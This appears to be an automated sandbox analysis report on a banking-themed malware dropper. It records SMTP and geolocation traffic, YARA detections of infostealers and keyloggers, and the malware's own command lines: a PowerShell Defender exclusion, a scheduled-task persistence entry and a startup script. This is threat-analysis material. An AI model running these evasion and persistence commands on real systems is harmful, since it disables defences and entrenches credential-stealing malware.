2024-11-28 17:26:53 UTC	12	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38 Data Ascii: 8.46.123.228

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49704	172.67.177.134	443	6012	C:\Users\user\AppData\Local\Temp\server02.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-28 17:26:55 UTC	85	OUT	GET /xml/8.46.123.228 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-28 17:26:55 UTC	876	IN	HTTP/1.1 200 OK Date: Thu, 28 Nov 2024 17:26:55 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 77986 Last-Modified: Wed, 27 Nov 2024 19:47:09 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5yNHzq7WqjN%2Be7ZaAmATibVDVTxD9t6%2FujdUPTj7IJ8IkTAtfakwtMOhSmoWhHaNY2CB2FarlYOY%2FcjGWCRml6YjD12du1AwWeDGXOkj1Ov6H4UX5pdVJbtCx0MmiQJEQ%2BE3w1KK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e9c10d38ec7f78d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1470&min_rtt=1466&rtt_var=558&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1945369&cwnd=32&unsent_bytes=0&cid=893826f9c410926d&ts=453&x=0"
2024-11-28 17:26:55 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Nov 28, 2024 18:26:55.780052900 CET	587	49705	51.195.88.199	192.168.2.7	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 28 Nov 2024 17:26:55 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 28, 2024 18:26:55.786144972 CET	49705	587	192.168.2.7	51.195.88.199	EHLO 549163
Nov 28, 2024 18:26:56.198338032 CET	587	49705	51.195.88.199	192.168.2.7	250-s82.gocheapweb.com Hello 549163 [8.46.123.228] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 28, 2024 18:26:56.200108051 CET	49705	587	192.168.2.7	51.195.88.199	STARTTLS
Nov 28, 2024 18:26:56.612540960 CET	587	49705	51.195.88.199	192.168.2.7	220 TLS go ahead
Nov 28, 2024 18:27:02.725837946 CET	587	49716	51.195.88.199	192.168.2.7	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 28 Nov 2024 17:27:02 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 28, 2024 18:27:02.729738951 CET	49716	587	192.168.2.7	51.195.88.199	EHLO 549163
Nov 28, 2024 18:27:03.173630953 CET	587	49716	51.195.88.199	192.168.2.7	250-s82.gocheapweb.com Hello 549163 [8.46.123.228] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 28, 2024 18:27:03.188604116 CET	49716	587	192.168.2.7	51.195.88.199	STARTTLS
Nov 28, 2024 18:27:03.599958897 CET	587	49716	51.195.88.199	192.168.2.7	220 TLS go ahead
Nov 28, 2024 18:28:42.193536043 CET	587	49930	51.195.88.199	192.168.2.7	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 28 Nov 2024 17:28:41 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 28, 2024 18:28:42.193768978 CET	49930	587	192.168.2.7	51.195.88.199	EHLO 549163
Nov 28, 2024 18:28:42.603873968 CET	587	49930	51.195.88.199	192.168.2.7	250-s82.gocheapweb.com Hello 549163 [8.46.123.228] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 28, 2024 18:28:42.604062080 CET	49930	587	192.168.2.7	51.195.88.199	STARTTLS
Nov 28, 2024 18:28:43.015196085 CET	587	49930	51.195.88.199	192.168.2.7	220 TLS go ahead
Nov 28, 2024 18:28:50.895925999 CET	587	49950	51.195.88.199	192.168.2.7	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 28 Nov 2024 17:28:50 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 28, 2024 18:28:50.896104097 CET	49950	587	192.168.2.7	51.195.88.199	EHLO 549163
Nov 28, 2024 18:28:51.358721972 CET	587	49950	51.195.88.199	192.168.2.7	250-s82.gocheapweb.com Hello 549163 [8.46.123.228] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 28, 2024 18:28:51.358891964 CET	49950	587	192.168.2.7	51.195.88.199	STARTTLS
Nov 28, 2024 18:28:51.782428026 CET	587	49950	51.195.88.199	192.168.2.7	220 TLS go ahead
Nov 28, 2024 18:29:37.857738018 CET	587	49985	51.195.88.199	192.168.2.7	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 28 Nov 2024 17:29:37 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 28, 2024 18:29:37.857985973 CET	49985	587	192.168.2.7	51.195.88.199	EHLO 549163
Nov 28, 2024 18:29:38.270150900 CET	587	49985	51.195.88.199	192.168.2.7	250-s82.gocheapweb.com Hello 549163 [8.46.123.228] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 28, 2024 18:29:38.270329952 CET	49985	587	192.168.2.7	51.195.88.199	STARTTLS
Nov 28, 2024 18:29:38.684851885 CET	587	49985	51.195.88.199	192.168.2.7	220 TLS go ahead
Nov 28, 2024 18:30:03.749540091 CET	587	49986	51.195.88.199	192.168.2.7	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 28 Nov 2024 17:30:03 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 28, 2024 18:30:03.749692917 CET	49986	587	192.168.2.7	51.195.88.199	EHLO 549163
Nov 28, 2024 18:30:04.165430069 CET	587	49986	51.195.88.199	192.168.2.7	250-s82.gocheapweb.com Hello 549163 [8.46.123.228] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 28, 2024 18:30:04.165564060 CET	49986	587	192.168.2.7	51.195.88.199	STARTTLS
Nov 28, 2024 18:30:04.574337006 CET	587	49986	51.195.88.199	192.168.2.7	220 TLS go ahead
Nov 28, 2024 18:30:06.443813086 CET	587	49987	51.195.88.199	192.168.2.7	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 28 Nov 2024 17:30:06 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 28, 2024 18:30:06.445475101 CET	49987	587	192.168.2.7	51.195.88.199	EHLO 549163
Nov 28, 2024 18:30:06.862308979 CET	587	49987	51.195.88.199	192.168.2.7	250-s82.gocheapweb.com Hello 549163 [8.46.123.228] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 28, 2024 18:30:06.869034052 CET	49987	587	192.168.2.7	51.195.88.199	STARTTLS
Nov 28, 2024 18:30:07.283963919 CET	587	49987	51.195.88.199	192.168.2.7	220 TLS go ahead
Nov 28, 2024 18:30:17.565928936 CET	587	49989	51.195.88.199	192.168.2.7	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 28 Nov 2024 17:30:17 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 28, 2024 18:30:17.566201925 CET	49989	587	192.168.2.7	51.195.88.199	EHLO 549163
Nov 28, 2024 18:30:17.977600098 CET	587	49989	51.195.88.199	192.168.2.7	250-s82.gocheapweb.com Hello 549163 [8.46.123.228] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 28, 2024 18:30:17.988353968 CET	49989	587	192.168.2.7	51.195.88.199	STARTTLS
Nov 28, 2024 18:30:18.397284031 CET	587	49989	51.195.88.199	192.168.2.7	220 TLS go ahead
Nov 28, 2024 18:30:35.806843042 CET	587	49990	51.195.88.199	192.168.2.7	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 28 Nov 2024 17:30:35 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 28, 2024 18:30:35.816112995 CET	49990	587	192.168.2.7	51.195.88.199	EHLO 549163
Nov 28, 2024 18:30:36.242697001 CET	587	49990	51.195.88.199	192.168.2.7	250-s82.gocheapweb.com Hello 549163 [8.46.123.228] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 28, 2024 18:30:36.243056059 CET	49990	587	192.168.2.7	51.195.88.199	STARTTLS
Nov 28, 2024 18:30:36.612401962 CET	587	49990	51.195.88.199	192.168.2.7	250-s82.gocheapweb.com Hello 549163 [8.46.123.228] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 28, 2024 18:30:36.667963982 CET	49990	587	192.168.2.7	51.195.88.199	STARTTLS
Nov 28, 2024 18:30:36.996812105 CET	587	49990	51.195.88.199	192.168.2.7	250-s82.gocheapweb.com Hello 549163 [8.46.123.228] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 28, 2024 18:30:37.385895967 CET	587	49990	51.195.88.199	192.168.2.7	220 TLS go ahead
Nov 28, 2024 18:30:56.699347019 CET	587	49991	51.195.88.199	192.168.2.7	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 28 Nov 2024 17:30:56 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.

Target ID:	0
Start time:	12:26:45
Start date:	28/11/2024
Path:	C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe"
Imagebase:	0x80000
File size:	2'267'136 bytes
MD5 hash:	FA7DCECB3C5AC81610C93C6B91CDA38A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	12:26:46
Start date:	28/11/2024
Path:	C:\Users\user\AppData\Local\bothsided\spadixes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe"
Imagebase:	0x8c0000
File size:	2'267'136 bytes
MD5 hash:	FA7DCECB3C5AC81610C93C6B91CDA38A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.1285293466.0000000003CC0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	12:26:47
Start date:	28/11/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe"
Imagebase:	0xcc0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000005.00000002.1295590843.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000003.1283416530.0000000008200000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000002.1328426557.0000000008260000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000002.1300865419.0000000005800000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1302736160.0000000006F05000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1302736160.0000000006F05000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000002.1302736160.0000000006F05000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000002.1329059100.0000000008400000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	12:26:49
Start date:	28/11/2024
Path:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Imagebase:	0x400000
File size:	1'290'240 bytes
MD5 hash:	911868154988B08BC9EC4AF4D85832D3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	12:26:49
Start date:	28/11/2024
Path:	C:\Users\user\AppData\Local\Temp\TrojanAI.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\TrojanAI.exe"
Imagebase:	0x640000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 92%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	12:26:49
Start date:	28/11/2024
Path:	C:\Users\user\AppData\Local\Temp\server02.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\server02.exe"
Imagebase:	0x530000
File size:	98'304 bytes
MD5 hash:	D49B97C9900DA1344E4E8481551CC14C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.3712810154.00000000029C4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000C.00000000.1292636248.0000000000532000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000000.1292636248.0000000000532000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000000.1292636248.0000000000532000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000C.00000000.1292636248.0000000000532000.00000002.00000001.01000000.0000000A.sdmp, Author: unknown Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: C:\Users\user\AppData\Local\Temp\server02.exe, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\server02.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\server02.exe, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\server02.exe, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\server02.exe, Author: Florian Roth
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 83%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	12:26:49
Start date:	28/11/2024
Path:	C:\Users\user\AppData\Local\Temp\neworigin.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\neworigin.exe"
Imagebase:	0x2f0000
File size:	250'368 bytes
MD5 hash:	D6A4CF0966D24C1EA836BA9A899751E5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.3714279992.0000000002661000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.3714279992.0000000002661000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000000.1294374756.00000000002F2000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000000.1294374756.00000000002F2000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 82%, ReversingLabs
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	12:26:52
Start date:	28/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Imagebase:	0xac0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	12:26:52
Start date:	28/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:31 /du 23:59 /sc daily /ri 1 /f
Imagebase:	0x190000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	12:26:52
Start date:	28/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	12:26:52
Start date:	28/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	12:26:52
Start date:	28/11/2024
Path:	C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Imagebase:	0xfe0000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 92%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	12:26:52
Start date:	28/11/2024
Path:	C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Imagebase:	0xde0000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	12:26:52
Start date:	28/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpA3B8.tmp.cmd""
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	12:26:52
Start date:	28/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	12:26:53
Start date:	28/11/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout 6
Imagebase:	0x970000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	12:26:56
Start date:	28/11/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff7fb730000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	12:27:00
Start date:	28/11/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs"
Imagebase:	0x7ff741390000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	12:27:00
Start date:	28/11/2024
Path:	C:\Users\user\AppData\Local\bothsided\spadixes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\bothsided\spadixes.exe"
Imagebase:	0x8c0000
File size:	2'267'136 bytes
MD5 hash:	FA7DCECB3C5AC81610C93C6B91CDA38A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000001A.00000002.1427486186.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	12:27:01
Start date:	28/11/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\bothsided\spadixes.exe"
Imagebase:	0xcc0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	12:27:02
Start date:	28/11/2024
Path:	C:\Users\user\AppData\Local\bothsided\spadixes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\bothsided\spadixes.exe"
Imagebase:	0x8c0000
File size:	2'267'136 bytes
MD5 hash:	FA7DCECB3C5AC81610C93C6B91CDA38A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000001D.00000002.1441006965.0000000003680000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	12:27:04
Start date:	28/11/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\bothsided\spadixes.exe"
Imagebase:	0xcc0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	12:27:04
Start date:	28/11/2024
Path:	C:\Users\user\AppData\Local\bothsided\spadixes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\bothsided\spadixes.exe"
Imagebase:	0x8c0000
File size:	2'267'136 bytes
MD5 hash:	FA7DCECB3C5AC81610C93C6B91CDA38A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000001F.00000002.1452830281.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	12:27:05
Start date:	28/11/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	false
